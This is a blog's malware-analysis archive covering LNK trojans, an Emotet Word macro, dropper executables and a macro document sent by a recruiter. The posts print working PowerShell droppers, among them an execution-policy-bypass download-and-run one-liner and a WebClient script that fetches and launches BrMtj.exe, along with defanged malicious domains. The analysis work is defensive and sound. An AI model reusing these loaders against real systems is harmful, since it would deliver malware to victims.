Category Archives: Malware Analysis

Trojan malware – Microsoft Shortcut (LNK)

I downloaded this sample for malware analysis and change the extension to .LNK which is Microsoft Shortcut.

Right clicked on file and navigated to shortcut and found that there is target is PowerShell embedded


Below is PowerShell script which will drop another PowerShell script from the URL.

URL is http[:]// timebounder[.]ru and downloading PowerShell script pps[.]ps1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -Exec bypass -windo 1 $je=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String(‘aWV4’));sal calc $je;$mM=((New-Object Net.WebClient)).DownloadString(‘http[:]//timebounder[.]ru/ pps.ps1’);calc $mM


I tried running script but the website is down (http[:]// timebounder[.]ru) and unable to download PowerShell script.

Virustotal –

SHA256 – 4e69c30090d67980721c36c655116e7f77059672606dfd9dc28206c0472fee98


Microsoft Shortcut (LNK) trojan malware

I have downloaded this Microsoft shortcut malicious sample from Virustotal for analysis

After downloading, I renamed as sample.lnk. (Microsoft shortcut extension .LNK)

When I opened properties tab of this file, found below properties which clearly shows its now shortcut of any application but a PowerShell script which executed on opening.

  • Target Type: Application
  • Target: PowerShell scrip
  • Description: Windows PowerShell




I copied and pasted PowerShell script to text file.


Behavior of PowerShell script:

  • Download another PowerShell script out-763347625.ps1 from URL https[:]// latinotca-ar[.]com

I double click on it to check the behavior, a command prompt windows opened and closed.

I could see the PowerShell script executed and tried to connect to the URL. WireShark captured the network traffic.




The web site has taken down. I tried to open the URL in browser, URL is inaccessible.

VIrusTotal sample:

SHA-256: 5c5c2c6197d4b1c24c438b8fb0452257c9e4085ac59297a985ec92ef1720b74d


Emotet malware analysis

VirusTotal sample – c9bdfb2d6ac9e493bc391b2f64b48d8d5cde10645ea921951b23112e6d73545c

File Type: Microsoft Word Document

Document Property:

I have used Oletools to analyse word document properties and analyse content.



This word document has VBA macros.

After parsing word document using olevba, this tells, file has suspicious hex string and Base64 strings.

And file has below macros,

  • LUDoB_BX.cls
  • fkkkCAk.bas
  • ZAAcAA.bas

And macros will auto execute on opening document


I start debugging macros in word document,


After Enable Editing, Open View Macros under View tab



Click on Edit and change autoopen() function to autoopen2().


There are many small chunks of Base64 strings which  are concatenating and creating a PowerShell script I have captured the Base64 string in text file and tried to decode. I didn’t get the complete base64 but some part of it and can be recognized it is PowerShell script.


(nEw-OBJECt sySTeM.Io.comPReSsIOn.dEfLatEstReAM( [Io.mEMORystREam] [coNverT]::FrOMbase64stRING((‘ZZJh’+’i’+’5’+’tAEIb/y’+’n’+’4’+’QNiFVz9YP5US4MbYSS’+’gOmhLN’+’H’+’QXQz’+’6kbd9XSjOUL’+’+e’+’zdtJbSdb7s87z’+’vDO2’+’O8g’+’q5’+’z4P’+’r0E’+’EA’+’an8’+’OI’+’esbXKA5TGfoCJ1PmR2SK’+’bFFZz5ivG45’+’CecZrKJMA’+’wKeV’+’Ut2jbW’+’M’+’7

during debugging, I got the below values are stored in the variable YAAAAAA and it is reading registry key values.




while debugging, I captured traffic using WireShark and found, connection has been made to web site emseenerji[.]com at IP 94[.]73[.]147[.]237. URL is still alive and can be accessed.



The complete URL which was accessed by this program http:// emseenerji[.]com/wp-content/RRKu/

My host machine AV blocked this URL and I couldn’t analyze traffic further from this URL to my VM.

Thank you.

HelpMe.exe malware


SHA256 – 9ff1c8e6d80ebf5626714362cbc55a53ba17038e841773d24fdc018891adb52e

Tools used for analysis: OllydbgWireSharkPEExplorer,

I started debugging using Ollydbg. The first warning I received is

“Module ‘AutoRUN_’ has entry point outside the code (as specified in the PE header). Maybe this file is self-extracting or self-modifying. Please keep it in mind when setting breakpoints!”


The executable file extracts HelpMe.exe file and copy it to C:\Windows\System32



Also it got extracted AUTORUN_INF.exe file at C:\ location. same location it create files

AUTORUN.ini file



AutoRun.exe file executes HelpMe.exe file.

This also adds HelpMe.exe file to Startup programs and rename shortcut icon to Soft

soft ink


Behavior of this malware I observed is, this gets replicated itself and and creates/hides word, pdf, xsls and  pages document files under RecycleBin folder.


I also observed the HelpMe.exe keep changing location from C:\Windows\System32 to C:\Windows\SysWow64

I stopped my analysis here after spending 2 days as there are a lot of things this malware doing in background.


SmartConnect.exe Malware


SHA-256 — 7c3e2a38dcacc3246409151ecdf283814611a8f9d98ed0e5996fb2615adc2cc2

I pulled the request for malware sample from Malshare for analysis and renamed the file with .exe extension.

Tools I used: Ollydbg, WireShark, PEExplorer,

I downloaded malware sample, opened in PE explorer, and found resource information


Before I start debugginh, I extracted the malware executable file using 7-zip. There were 2 vpn applications KVPN kerio application and openvpn.


On opening settings.ini file from above list, There was license owner information given as www. WebTune . ir


I started debugging of malware executable in ollydbg. It shows the behavior of application, check below image.

exe files

Malware program got installed and location was

C:\Program Files (x86)\P3Filter v2.3714840114\SmartConnection.exe

It also added short cut file in start program menu.


it also installed kerio vpn switch adapter on my virtual machine.


Wireshark packets showed, application is trying to connect to below URL and DNS is resolving to domain mycn .ir

domain — mycn. ir



Please post your suggestions to improve my analysis.


Is openssh.ps1 Malware?

Recently I have download Windows 10 VM from Microsoft’s site. Today, in c:\ drive I saw a folder named BGinfo which I know I had not created.

After opening it saw two files,


In openssh.ps1  file found URL,


After accessing URL, SSH setup executable file download. After searching URL in VirusTotal 

result shows, 2 AV detected it as Malware out of 62.

During the investigation I found, there is a BGinfo program added in Startup program. (I disabled it later).


And SSH installed on the server and services running in task scheduler.

I ran procmon and netmon to analyze the behavior. I haven’t found any unusual activity/call/traffic from/to remote server and not found any process/executable running in background.

During the analysis I haven’t run this PowerShell script.

VirusTotal –  [Link here]

Microsoft word document malware analysis

I had emailed a recruiter last year for a job opportunity. He reverted back year later with attachment and it was encrypted and provided password.


Unzipped and looked for the properties of word document.


I analysed file using Oletools  and the result showed it as a suspicious file.


I found value (“1jwe7d7n1544”) in the Macro code (which is highlighted in yellow).


After debugging macro from word document, I got base64 string (below the screenshot).



Converting base64 string, resulted in the below PowerShell code.

$instance = [System.Activator]::CreateInstance(“System.Net.WebClient”);
$method = [System.Net.WebClient].GetMethods();
foreach($m in $method){
if($m.Name -eq “DownloadData”){
$uri = New-Object System.Uri(“http://”)
$response = $m.Invoke($instance, ($uri));
$path = [System.Environment]::GetFolderPath(“CommonApplicationData”) + “\\BrMtj.exe”;
[System.IO.File]::WriteAllBytes($path, $response);
$clsid = New-Object Guid ‘C08AFD90-F2A1-11D1-8455-00A0C91F3880’
$type = [Type]::GetTypeFromCLSID($clsid)
$object = [Activator]::CreateInstance($type)
$object.Document.Application.ShellExecute($path,$nul, $nul, $nul,0)

Behavior of Macro — 

  • Executes when word document opens.

Behavior of PowerShell script —

  • PowerShell script access URL  (http://
  • It downloads executable file BrMtj.exe

Note: When i tried to access URL in browser, it was inaccessible.

Malware Sample on Virus Total — 

SHA256 — e4a959684cd6ea7248dc4d2ad0d5df2790ff217685c2a341d242a85b5808d720


Recent Entries »